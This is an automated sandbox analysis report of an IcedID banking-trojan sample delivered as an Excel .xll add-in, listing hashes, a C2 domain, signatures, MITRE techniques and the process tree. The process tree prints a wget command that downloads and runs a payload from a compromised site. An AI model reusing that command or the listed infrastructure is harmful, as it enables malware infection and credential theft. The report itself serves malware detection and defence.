icedid | 4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476

Analysis

max time kernel
111s
max time network
135s
platform
windows10_x64
resource
win10-en-20211208
submitted
15-12-2021 16:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

796da0af100f24a86410c3a31902dd8e.xll
Size

38.6MB
MD5

796da0af100f24a86410c3a31902dd8e
SHA1

4e4baee5983b63fab9fdaa3fde8007ce3f7bc789
SHA256

4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476
SHA512

d05d22ed4d8c3259fca6cc7690c2d208ea808d306ba524fa4ab7d83a6da8a5c210fd0c0f42f5dced75a86a53cced62efc9893a469f434906badc7daa3d064d6f

Score

10^/10

icedid 464168897 banker suricata trojan

Malware Config

Extracted

Language

xlm4.0

Source

Extracted

Family

icedid

Campaign

464168897

demicdefinite.ink

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Executes dropped EXE 4 IoCs

Processes:

wget.exeOracleVirtualization.exeOracleVirtualization.exeOracleVirtualization.exe

pid process

2796 wget.exe
3036 OracleVirtualization.exe
3540 OracleVirtualization.exe
344 OracleVirtualization.exe
Loads dropped DLL 4 IoCs

Processes:

EXCEL.EXE

pid process

2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
Suspicious use of SetThreadContext 1 IoCs

Processes:

OracleVirtualization.exe

description pid process target process

PID 3540 set thread context of 344 3540 OracleVirtualization.exe OracleVirtualization.exe

pid	process
2796	wget.exe
3036	OracleVirtualization.exe
3540	OracleVirtualization.exe
344	OracleVirtualization.exe

pid	process
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE

description	pid	process	target process
PID 3540 set thread context of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2440 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

OracleVirtualization.exe

pid process

344 OracleVirtualization.exe
344 OracleVirtualization.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE
2440 EXCEL.EXE

pid	process
2440	EXCEL.EXE

pid	process
344	OracleVirtualization.exe
344	OracleVirtualization.exe

pid	process
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE
2440	EXCEL.EXE

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

EXCEL.EXEOracleVirtualization.exeOracleVirtualization.exe

description	pid	process	target process
PID 2440 wrote to memory of 2796	2440	EXCEL.EXE	wget.exe
PID 2440 wrote to memory of 2796	2440	EXCEL.EXE	wget.exe
PID 2440 wrote to memory of 2796	2440	EXCEL.EXE	wget.exe
PID 2440 wrote to memory of 3036	2440	EXCEL.EXE	OracleVirtualization.exe
PID 2440 wrote to memory of 3036	2440	EXCEL.EXE	OracleVirtualization.exe
PID 3036 wrote to memory of 3540	3036	OracleVirtualization.exe	OracleVirtualization.exe
PID 3036 wrote to memory of 3540	3036	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe
PID 3540 wrote to memory of 344	3540	OracleVirtualization.exe	OracleVirtualization.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\796da0af100f24a86410c3a31902dd8e.xll"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2440

C:\Users\Admin\wget.exe
"C:\Users\Admin\wget.exe" --no-check-certificate -O "C:\Users\Admin\OracleVirtualization.exe" https://ba-healthcare.org/wp-content/uploads/2021/12/updateGoogle.cms
2⤵
- Executes dropped EXE
PID:2796

C:\Users\Admin\OracleVirtualization.exe
"C:\Users\Admin\OracleVirtualization.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3036

C:\Users\Admin\OracleVirtualization.exe
"C:\Users\Admin\OracleVirtualization.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3540

C:\Users\Admin\OracleVirtualization.exe
"C:\Users\Admin\OracleVirtualization.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:344

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\OracleVirtualization.exe

MD5
6b26a8fd39932aa56d48399a0d284d7b

SHA1
6707533cf83b4a9eed1471b0ce9a04783c680c2b

SHA256
42199506d8c44bd021027c4228ac67fab51abc1a08bef0d9e0b2a5dffb6583e9

SHA512
bc9d76fa5b589cf0726fa1421d2dce8df78c5588f025a2b221779cb4bbae15733d21a7982608536ad89d641f6be2de227a37947800cfad5cfb3becef2aeb199d

Download Submit
C:\Users\Admin\OracleVirtualization.exe

MD5
6b26a8fd39932aa56d48399a0d284d7b

SHA1
6707533cf83b4a9eed1471b0ce9a04783c680c2b

SHA256
42199506d8c44bd021027c4228ac67fab51abc1a08bef0d9e0b2a5dffb6583e9

SHA512
bc9d76fa5b589cf0726fa1421d2dce8df78c5588f025a2b221779cb4bbae15733d21a7982608536ad89d641f6be2de227a37947800cfad5cfb3becef2aeb199d

Download Submit
C:\Users\Admin\OracleVirtualization.exe

MD5
6b26a8fd39932aa56d48399a0d284d7b

SHA1
6707533cf83b4a9eed1471b0ce9a04783c680c2b

SHA256
42199506d8c44bd021027c4228ac67fab51abc1a08bef0d9e0b2a5dffb6583e9

SHA512
bc9d76fa5b589cf0726fa1421d2dce8df78c5588f025a2b221779cb4bbae15733d21a7982608536ad89d641f6be2de227a37947800cfad5cfb3becef2aeb199d

Download Submit
C:\Users\Admin\OracleVirtualization.exe

MD5
6b26a8fd39932aa56d48399a0d284d7b

SHA1
6707533cf83b4a9eed1471b0ce9a04783c680c2b

SHA256
42199506d8c44bd021027c4228ac67fab51abc1a08bef0d9e0b2a5dffb6583e9

SHA512
bc9d76fa5b589cf0726fa1421d2dce8df78c5588f025a2b221779cb4bbae15733d21a7982608536ad89d641f6be2de227a37947800cfad5cfb3becef2aeb199d

Download Submit
C:\Users\Admin\wget.exe

MD5
4adf8666660af672ce8517a41786425c

SHA1
53df66afbf60781422d6c22c19ab667cef450c16

SHA256
185ab8ccb3c754588a84ee5cd4910bc2aebdd6a27488232d6c8c1c9939ef5a36

SHA512
2e890dc4fce333cc287a1f206642b4e9213c6047081249892f469ec6bb9ecce27e14cbe84810be9a0d0bbd7dbac4730b09044c78f277acb6f9916571fdf72444

Download Submit
C:\Users\Admin\wget.exe

MD5
4adf8666660af672ce8517a41786425c

SHA1
53df66afbf60781422d6c22c19ab667cef450c16

SHA256
185ab8ccb3c754588a84ee5cd4910bc2aebdd6a27488232d6c8c1c9939ef5a36

SHA512
2e890dc4fce333cc287a1f206642b4e9213c6047081249892f469ec6bb9ecce27e14cbe84810be9a0d0bbd7dbac4730b09044c78f277acb6f9916571fdf72444

Download Submit
\Users\Admin\AppData\Local\Temp\796da0af100f24a86410c3a31902dd8e.xll

MD5
796da0af100f24a86410c3a31902dd8e

SHA1
4e4baee5983b63fab9fdaa3fde8007ce3f7bc789

SHA256
4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476

SHA512
d05d22ed4d8c3259fca6cc7690c2d208ea808d306ba524fa4ab7d83a6da8a5c210fd0c0f42f5dced75a86a53cced62efc9893a469f434906badc7daa3d064d6f

Download Submit
\Users\Admin\AppData\Local\Temp\796da0af100f24a86410c3a31902dd8e.xll

MD5
796da0af100f24a86410c3a31902dd8e

SHA1
4e4baee5983b63fab9fdaa3fde8007ce3f7bc789

SHA256
4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476

SHA512
d05d22ed4d8c3259fca6cc7690c2d208ea808d306ba524fa4ab7d83a6da8a5c210fd0c0f42f5dced75a86a53cced62efc9893a469f434906badc7daa3d064d6f

Download Submit
\Users\Admin\AppData\Local\Temp\796da0af100f24a86410c3a31902dd8e.xll

MD5
796da0af100f24a86410c3a31902dd8e

SHA1
4e4baee5983b63fab9fdaa3fde8007ce3f7bc789

SHA256
4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476

SHA512
d05d22ed4d8c3259fca6cc7690c2d208ea808d306ba524fa4ab7d83a6da8a5c210fd0c0f42f5dced75a86a53cced62efc9893a469f434906badc7daa3d064d6f

Download Submit
\Users\Admin\AppData\Local\Temp\796da0af100f24a86410c3a31902dd8e.xll

MD5
796da0af100f24a86410c3a31902dd8e

SHA1
4e4baee5983b63fab9fdaa3fde8007ce3f7bc789

SHA256
4eb2f8ea59796720f540e2507cf48f9b864ee5e19a8746b70c9b3bf78d485476

SHA512
d05d22ed4d8c3259fca6cc7690c2d208ea808d306ba524fa4ab7d83a6da8a5c210fd0c0f42f5dced75a86a53cced62efc9893a469f434906badc7daa3d064d6f

Download Submit
memory/344-271-0x00007FF6BCF71364-mapping.dmp

Download
memory/344-273-0x00007FF6BCF70000-0x00007FF6BCF79000-memory.dmp

Filesize
36KB

Download
memory/2440-120-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp

Filesize
64KB

Download
memory/2440-124-0x00000190A6610000-0x00000190A6612000-memory.dmp

Filesize
8KB

Download
memory/2440-123-0x00000190A6610000-0x00000190A6612000-memory.dmp

Filesize
8KB

Download
memory/2440-122-0x00000190A6610000-0x00000190A6612000-memory.dmp

Filesize
8KB

Download
memory/2440-121-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp

Filesize
64KB

Download
memory/2440-118-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp

Filesize
64KB

Download
memory/2440-119-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp

Filesize
64KB

Download
memory/2440-130-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp

Filesize
64KB

Download
memory/2796-262-0x0000000000000000-mapping.dmp

Download
memory/3036-266-0x0000000000000000-mapping.dmp

Download
memory/3540-268-0x0000000000000000-mapping.dmp

Download